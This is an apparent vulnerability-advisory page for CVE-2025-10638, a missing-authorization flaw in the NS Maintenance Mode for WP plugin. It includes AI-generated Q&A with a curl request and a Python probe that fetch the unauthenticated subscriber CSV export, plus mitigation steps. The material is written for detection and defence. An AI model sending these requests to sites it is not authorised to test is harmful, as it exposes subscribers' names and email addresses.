CVE-2025-10638
BaseFortify
Publication date: 2025-10-22
Last updated on: 2025-10-22
Assigner: WPScan
Description
CVSS Scores
EPSS Scores
| Metric | Value |
|---|---|
| Probability | |
| Percentile | |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| wordpress | ns_maintenance_mode_for_wp | 1.3.1 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-UNKNOWN | |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-10638 is a missing-authorization vulnerability in the NS Maintenance Mode for WP WordPress plugin (versions up to and including 1.3.1). The plugin's subscriber export function does not check who is calling it, so an unauthenticated attacker can send an ordinary request to the plugin's export action and download a CSV file containing all of the site's subscribers, including their names and email addresses. [1]
How can this vulnerability impact me?
This vulnerability can lead to unauthorized disclosure of subscriber data, exposing names and email addresses to attackers without any authentication. This can result in privacy breaches, spam, phishing attacks targeting subscribers, and damage to the site's reputation. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected in two steps. First, confirm that the site runs the NS Maintenance Mode for WP plugin at version 1.3.1 or earlier (for example from the plugin list in the WordPress admin, or from the plugin's public readme.txt under `wp-content/plugins/`). Second, test the export function itself: send an unauthenticated POST request (no cookies, no nonce) to `wp-admin/admin-ajax.php` with the parameter `action=ns_mm_create_csv_subscriber`. If the response is an HTTP 200 carrying a CSV body (typically with a `Content-Type: text/csv` and a `Content-Disposition: attachment` header) that lists subscriber names and email addresses, the vulnerability is present. A bare `0` in the response body is WordPress's default reply when no handler accepted the action, which means the unauthenticated path is not exposed. Example command using curl, printing the response headers and saving the body to a file: `curl -s -D - -o export-test.csv -X POST https://yourwordpresssite.com/wp-admin/admin-ajax.php -d "action=ns_mm_create_csv_subscriber"`, then inspect `export-test.csv` for subscriber data. Only run this against sites you are authorised to test, since a positive result downloads real personal data. [1]
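The following script automates both detection steps described above. It is an added example and is not code from the page, from WPScan, or from the plugin. It assumes (neither is stated on the page) that the plugin's directory slug is `ns-maintenance-mode-for-wp`, so that its `readme.txt` can be fetched, and that a vulnerable export answers with a CSV attachment whose header row or data contains email addresses. The sample readme text and HTTP responses in the test are constructed, so the classification logic can be exercised offline; `probe()` performs the live request and is only invoked from the command line.

```python
"""Detection helper for CVE-2025-10638 (added example, not from the page or the plugin).

Step 1: read the plugin's public readme.txt and compare its "Stable tag" with 1.3.1.
Step 2: POST action=ns_mm_create_csv_subscriber to admin-ajax.php with no cookies
        and decide whether a subscriber CSV came back.
"""
import csv
import io
import re
import sys
import urllib.error
import urllib.parse
import urllib.request

AJAX_ACTION = "ns_mm_create_csv_subscriber"   # action name quoted in the advisory text
PLUGIN_SLUG = "ns-maintenance-mode-for-wp"    # ASSUMPTION: plugin directory name
LAST_VULNERABLE = (1, 3, 1)                   # "up to and including 1.3.1"


def parse_version(text: str) -> tuple:
    """'1.3.1' -> (1, 3, 1); ignores suffixes such as '-beta'."""
    return tuple(int(p) for p in re.match(r"\d+(?:\.\d+)*", text.strip()).group(0).split("."))


def readme_version(readme_text: str):
    """Return the 'Stable tag' of a WordPress plugin readme.txt as a tuple, or None."""
    m = re.search(r"^\s*Stable tag:\s*([0-9][0-9.]*)", readme_text, re.IGNORECASE | re.MULTILINE)
    return parse_version(m.group(1)) if m else None


def version_is_affected(readme_text: str) -> bool:
    """True when the readme reports a version no newer than the last vulnerable one."""
    v = readme_version(readme_text)
    return v is not None and v <= LAST_VULNERABLE


def looks_like_subscriber_csv(status: int, headers: dict, body: bytes) -> bool:
    """Classify an unauthenticated admin-ajax.php response.

    WordPress answers unknown or refused actions with the bare body '0'
    (HTTP 400 on current releases), so only a 200 with CSV-shaped content
    counts. A header-only CSV still counts: the export is reachable even if
    the site currently has no subscribers.
    """
    if status != 200:
        return False
    h = {k.lower(): v.lower() for k, v in headers.items()}
    if "text/csv" not in h.get("content-type", "") and "attachment" not in h.get("content-disposition", ""):
        return False
    text = body.decode("utf-8", errors="replace").lstrip("\ufeff")  # drop a UTF-8 BOM if present
    rows = list(csv.reader(io.StringIO(text)))
    if not rows:
        return False
    header = [c.strip().lower() for c in rows[0]]
    has_email_column = any("email" in c for c in header)
    has_email_value = any("@" in cell for row in rows[1:] for cell in row)
    return has_email_column or has_email_value


def probe(site_url: str, timeout: float = 10.0) -> dict:
    """Run both checks against a live site you are authorised to test."""
    base = site_url.rstrip("/")
    result = {"version_affected": None, "export_exposed": False}
    try:
        with urllib.request.urlopen(f"{base}/wp-content/plugins/{PLUGIN_SLUG}/readme.txt", timeout=timeout) as r:
            result["version_affected"] = version_is_affected(r.read().decode("utf-8", "replace"))
    except (urllib.error.URLError, ValueError):
        pass  # readme not reachable: rely on the behavioural check alone
    data = urllib.parse.urlencode({"action": AJAX_ACTION}).encode()
    req = urllib.request.Request(f"{base}/wp-admin/admin-ajax.php", data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as r:   # no cookies are sent
            status, headers, body = r.status, dict(r.headers), r.read()
    except urllib.error.HTTPError as e:
        status, headers, body = e.code, dict(e.headers), e.read()
    result["export_exposed"] = looks_like_subscriber_csv(status, headers, body)
    return result


if __name__ == "__main__":
    print(probe(sys.argv[1] if len(sys.argv) > 1 else "https://yourwordpresssite.com"))
```

Run it as `python3 check_cve_2025_10638.py https://yourwordpresssite.com`. A result of `{'export_exposed': True, ...}` means the unauthenticated export worked and the file it returned contains real subscriber data, so handle and delete it accordingly; `version_affected` being `None` only means the readme could not be read, not that the plugin is absent.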
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include disabling or removing the NS Maintenance Mode for WP plugin until a fixed release is available, blocking the vulnerable action for unauthenticated clients at the web server or WAF layer (for example, rejecting requests to `wp-admin/admin-ajax.php` whose `action` parameter is `ns_mm_create_csv_subscriber` unless a logged-in WordPress session cookie is present), and reviewing web server logs for POST requests carrying that action, which would indicate the export has already been pulled. Note that restricting all of `wp-admin/admin-ajax.php` to authenticated users is not a safe shortcut: WordPress intentionally serves unauthenticated AJAX handlers from that file, and many themes and plugins depend on it for front-end functionality. Since no fixed version is listed here, limiting exposure and access is critical, and the plugin should be updated as soon as a release that addresses the issue is published. [1]